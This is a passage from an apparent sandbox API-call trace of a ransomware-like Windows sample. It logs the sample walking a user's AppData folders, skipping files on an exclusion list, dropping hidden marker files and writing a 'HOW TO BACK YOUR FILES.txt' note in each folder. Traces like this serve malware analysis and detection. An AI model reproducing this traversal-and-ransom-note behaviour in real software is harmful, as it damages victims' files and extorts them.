dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.599] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.599] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.599] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.599] CloseHandle (hObject=0x278) returned 1 [0063.599] CloseHandle (hObject=0x298) returned 1 [0063.600] GetCurrentThreadId () returned 0xd98 [0063.600] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122288 [0063.600] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC" [0063.600] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124810 | out: hHeap=0xe0000) returned 1 [0063.600] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122280 | out: hHeap=0xe0000) returned 1 [0063.600] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC" [0063.600] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\" [0063.600] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3" [0063.600] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsfeedbackhub_8wekyb3d8bbwe\\ac\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.603] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.606] FlushFileBuffers (hFile=0x298) returned 1 [0063.607] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.607] CloseHandle (hObject=0x298) returned 1 [0063.607] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC") returned 84 [0063.608] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.608] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbede9823, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xbedef9f4, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xef3cafda, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0063.608] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.608] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.608] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.608] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.608] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbede9823, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xbedef9f4, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xef3cafda, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.608] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.608] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.608] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.608] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.608] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.608] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef3cafda, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef3cafda, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef3cafda, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.608] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.608] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.608] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbedebf51, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd1a4fb8a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xbedebf51, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0063.608] lstrcmpiW (lpString1="INetCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.608] lstrcmpiW (lpString1="INetCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.608] lstrcmpiW (lpString1="INetCache", lpString2="Rabbit4444.exe") returned -1 [0063.608] lstrcmpiW (lpString1="INetCache", lpString2=".") returned 1 [0063.608] lstrcmpiW (lpString1="INetCache", lpString2="..") returned 1 [0063.608] lstrcmpiW (lpString1="INetCache", lpString2="windows") returned -1 [0063.608] lstrcmpiW (lpString1="INetCache", lpString2="bootmgr") returned 1 [0063.608] lstrcmpiW (lpString1="INetCache", lpString2="pagefile.sys") returned -1 [0063.608] lstrcmpiW (lpString1="INetCache", lpString2="boot") returned 1 [0063.608] lstrcmpiW (lpString1="INetCache", lpString2="ids.txt") returned 1 [0063.608] lstrcmpiW (lpString1="INetCache", lpString2="NTUSER.DAT") returned -1 [0063.608] lstrcpyW (in: lpString1=0x130ebe2, lpString2="INetCache" | out: lpString1="INetCache") returned="INetCache" [0063.608] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetCache", dwFileAttributes=0x2012) returned 1 [0063.609] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122080 [0063.609] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xbe) returned 0x11e2c0 [0063.609] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122088 | out: ListHead=0xf68b0, ListEntry=0x122088) returned 0x122188 [0063.609] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbedee638, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd1a5030e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xbedee638, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0063.609] lstrcmpiW (lpString1="INetCookies", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.609] lstrcmpiW (lpString1="INetCookies", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.609] lstrcmpiW (lpString1="INetCookies", lpString2="Rabbit4444.exe") returned -1 [0063.609] lstrcmpiW (lpString1="INetCookies", lpString2=".") returned 1 [0063.609] lstrcmpiW (lpString1="INetCookies", lpString2="..") returned 1 [0063.609] lstrcmpiW (lpString1="INetCookies", lpString2="windows") returned -1 [0063.609] lstrcmpiW (lpString1="INetCookies", lpString2="bootmgr") returned 1 [0063.609] lstrcmpiW (lpString1="INetCookies", lpString2="pagefile.sys") returned -1 [0063.609] lstrcmpiW (lpString1="INetCookies", lpString2="boot") returned 1 [0063.609] lstrcmpiW (lpString1="INetCookies", lpString2="ids.txt") returned 1 [0063.609] lstrcmpiW (lpString1="INetCookies", lpString2="NTUSER.DAT") returned -1 [0063.609] lstrcpyW (in: lpString1=0x130ebe2, lpString2="INetCookies" | out: lpString1="INetCookies") returned="INetCookies" [0063.609] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetCookies", dwFileAttributes=0x2012) returned 1 [0063.610] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121f80 [0063.610] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc2) returned 0x116450 [0063.610] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121f88 | out: ListHead=0xf68b0, ListEntry=0x121f88) returned 0x122088 [0063.610] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbedee638, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xbedee638, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xbedee638, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0063.610] lstrcmpiW (lpString1="INetHistory", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.610] lstrcmpiW (lpString1="INetHistory", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.610] lstrcmpiW (lpString1="INetHistory", lpString2="Rabbit4444.exe") returned -1 [0063.610] lstrcmpiW (lpString1="INetHistory", lpString2=".") returned 1 [0063.610] lstrcmpiW (lpString1="INetHistory", lpString2="..") returned 1 [0063.610] lstrcmpiW (lpString1="INetHistory", lpString2="windows") returned -1 [0063.610] lstrcmpiW (lpString1="INetHistory", lpString2="bootmgr") returned 1 [0063.610] lstrcmpiW (lpString1="INetHistory", lpString2="pagefile.sys") returned -1 [0063.610] lstrcmpiW (lpString1="INetHistory", lpString2="boot") returned 1 [0063.610] lstrcmpiW (lpString1="INetHistory", lpString2="ids.txt") returned 1 [0063.610] lstrcmpiW (lpString1="INetHistory", lpString2="NTUSER.DAT") returned -1 [0063.610] lstrcpyW (in: lpString1=0x130ebe2, lpString2="INetHistory" | out: lpString1="INetHistory") returned="INetHistory" [0063.610] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetHistory", dwFileAttributes=0x2012) returned 1 [0063.611] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1220a0 [0063.611] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc2) returned 0x116930 [0063.611] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1220a8 | out: ListHead=0xf68b0, ListEntry=0x1220a8) returned 0x121f88 [0063.611] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbedebf51, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xbedebf51, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xbedebf51, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0063.611] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.611] lstrcmpiW (lpString1="Temp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.611] lstrcmpiW (lpString1="Temp", lpString2="Rabbit4444.exe") returned 1 [0063.611] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0063.611] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0063.611] lstrcmpiW (lpString1="Temp", lpString2="windows") returned -1 [0063.611] lstrcmpiW (lpString1="Temp", lpString2="bootmgr") returned 1 [0063.611] lstrcmpiW (lpString1="Temp", lpString2="pagefile.sys") returned 1 [0063.611] lstrcmpiW (lpString1="Temp", lpString2="boot") returned 1 [0063.611] lstrcmpiW (lpString1="Temp", lpString2="ids.txt") returned 1 [0063.611] lstrcmpiW (lpString1="Temp", lpString2="NTUSER.DAT") returned 1 [0063.611] lstrcpyW (in: lpString1=0x130ebe2, lpString2="Temp" | out: lpString1="Temp") returned="Temp" [0063.611] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122360 [0063.611] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb4) returned 0x122cc0 [0063.611] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122368 | out: ListHead=0xf68b0, ListEntry=0x122368) returned 0x1220a8 [0063.611] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbedebf51, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xbedebf51, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xbedebf51, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0063.611] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0063.611] lstrcpyW (in: lpString1=0x130ebe2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.611] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsfeedbackhub_8wekyb3d8bbwe\\ac\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.612] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.612] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.612] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.612] CloseHandle (hObject=0x278) returned 1 [0063.612] CloseHandle (hObject=0x298) returned 1 [0063.612] GetCurrentThreadId () returned 0xd98 [0063.612] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122368 [0063.613] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\Temp", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\Temp" [0063.613] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122cc0 | out: hHeap=0xe0000) returned 1 [0063.613] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122360 | out: hHeap=0xe0000) returned 1 [0063.613] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\Temp" [0063.613] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\Temp\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\Temp\\" [0063.613] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\Temp\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3" [0063.613] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsfeedbackhub_8wekyb3d8bbwe\\ac\\temp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.614] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.616] FlushFileBuffers (hFile=0x298) returned 1 [0063.617] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.617] CloseHandle (hObject=0x298) returned 1 [0063.618] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\Temp") returned 89 [0063.618] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.618] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbedebf51, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xbedebf51, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xef3cafda, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0063.618] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.618] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.618] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.618] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.618] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbedebf51, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xbedebf51, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xef3cafda, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.618] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.618] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.618] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.618] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.618] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.618] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef3cafda, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef3cafda, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef3cafda, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.618] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.618] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.618] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef3cafda, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef3cafda, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef3cafda, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.618] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0063.618] lstrcpyW (in: lpString1=0x130ebec, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.619] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\Temp\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsfeedbackhub_8wekyb3d8bbwe\\ac\\temp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.619] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.620] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.620] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.620] CloseHandle (hObject=0x278) returned 1 [0063.620] CloseHandle (hObject=0x298) returned 1 [0063.620] GetCurrentThreadId () returned 0xd98 [0063.620] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1220a8 [0063.620] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetHistory", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetHistory" [0063.620] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116930 | out: hHeap=0xe0000) returned 1 [0063.620] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1220a0 | out: hHeap=0xe0000) returned 1 [0063.620] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetHistory" [0063.620] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetHistory\\") 